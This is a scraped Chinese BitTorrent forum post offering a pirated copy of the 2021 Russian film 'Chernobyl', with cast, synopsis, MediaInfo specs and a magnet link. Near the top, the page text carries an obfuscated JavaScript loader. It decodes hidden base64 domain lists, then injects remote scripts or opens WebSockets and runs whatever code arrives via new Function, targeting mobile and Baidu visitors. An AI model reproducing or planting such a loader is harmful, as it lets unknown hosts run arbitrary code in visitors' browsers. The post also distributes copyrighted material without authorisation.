切尔诺贝利[中文字幕]Chernobyl.2021.1080p.BluRay.DTS.x265-10bit-迅雷下载 7.97GB

版主小s 12天前 182

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 切尔诺贝利 / Chernobyl / Chernobyl: Abyss / Chernobyl 1986 / Чернобыль: Бездна

◎片 名 Чернобыль

◎年 代 2021

◎产 地 俄罗斯

◎类 别 剧情 / 灾难

◎语 言 俄语

◎上映日期 2021-04-15(俄罗斯)

◎IMDb链接 https://www.imdb.com/title/tt10648714/

◎豆瓣评分 6.3/10 (1430人评价)

◎豆瓣链接 https://movie.douban.com/subject/34966152/

◎片 长 136分钟

◎导 演 丹尼拉·科兹洛夫斯基 Danila Kozlovsky (id:1213388)

◎编 剧 埃琳娜·伊万诺娃 Elena Ivanova (id:1458523)

阿列克谢·卡扎科夫 Aleksey Kazakov (id:1458524)

◎演 员 丹尼拉·科兹洛夫斯基 Danila Kozlovsky (id:1213388)

奥莎娜·阿金什那 Oksana Akinshina (id:1000376)

菲利普·阿德耶夫 Fillip Adeyev (id:1247483)

拉芙珊娜·库珂娃 Ravshana Kurkova (id:1406158)

尼古拉·科扎克 Nikolay Kozak (id:1458525)

伊戈尔·切涅维奇 Igor Chernevich (id:1314918)

阿图尔·贝沙斯特尼 Artur Beschastnyy (id:1458528)

尼古拉·萨姆索诺夫 Nikolay Samsonov (id:1449296)

安东·施瓦茨 Anton Shwartz (id:1458529)

安德烈·阿尔查科夫 Andrey Archakov (id:1458530)

萨维尔·塔德沃西安 Samvel Tadevosian (id:1458531)

马克·贾尼塞洛 Mark Janicello (id:1458533)

德米特里·马特维耶夫 Dmitrii Matveev (id:1458532)

◎标 签 灾难 / 俄罗斯 / 历史 / 人性 / 剧情 / 苏联 / 社会 / 2021

◎简 介

这是俄罗斯第一部大型电影,讲述了切尔诺贝利核电站事故的后果以及为避免全球灾难付出生命代价的人们的复原情况。并将欧洲大陆的大部分地区变成一个巨大的异地区和无人居住的沙漠。主角是消防队员阿列克谢,初看起来不像英雄。瓦莱尔卡工程师和鲍里斯的潜水员自愿同他一起去进行危险的突袭。 几乎没有时间制定详细的计划。由于熔化的堆芯临近,反应堆容器内的水每小时都变得越来越热。该小组面临着一个致命的任务,一个最危险的任务-去地狱,也许是最可怕的灾难后果。

  1. General

  2. Unique ID : 181546746459543155840013446672042526691 (0x8894A1AC08361DAFC2B70177508187E3)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.97 GiB

  7. Duration : 2 h 16 min

  8. Overall bit rate : 8 365 kb/s

  9. Movie name : Chernobyl 2021 1080p BluRay DTS [email protected]

  10. Encoded date : UTC 2021-07-14 12:10:04

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 16 min

  20. Bit rate : 6 823 kb/s

  21. Width : 1 920 pixels

  22. Height : 800 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.185

  30. Stream size : 6.50 GiB (82%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 2 h 16 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.44 GiB (18%)

  50. Title : Russian

  51. Language : Russian

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 2 h 8 min

  61. Bit rate : 24.2 kb/s

  62. Count of elements : 2072

  63. Stream size : 22.2 MiB (0%)

  64. Title : ENG

  65. Language : English

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 2 h 8 min

  75. Bit rate : 20.8 kb/s

  76. Count of elements : 2076

  77. Stream size : 19.1 MiB (0%)

  78. Title : CHS

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Text #3

  83. ID : 5

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 2 h 8 min

  89. Bit rate : 21.4 kb/s

  90. Count of elements : 2076

  91. Stream size : 19.7 MiB (0%)

  92. Title : CHT

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Menu

  97. 00:00:00.000 : en:Chapter 01

  98. 00:17:18.917 : en:Chapter 02

  99. 00:34:18.542 : en:Chapter 03

  100. 00:50:42.375 : en:Chapter 04

  101. 01:07:19.583 : en:Chapter 05

  102. 01:25:18.000 : en:Chapter 06

  103. 01:36:17.958 : en:Chapter 07

  104. 01:47:06.708 : en:Chapter 08

  105. 02:03:34.958 : en:Chapter 09

  106. 02:07:12.125 : en:Chapter 10


TAGS 剧情 灾难

磁力链:
  • magnet:?xt=urn:btih:A7642AB3E337B97F6212FDBE854EE5AA63B5EFD6
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回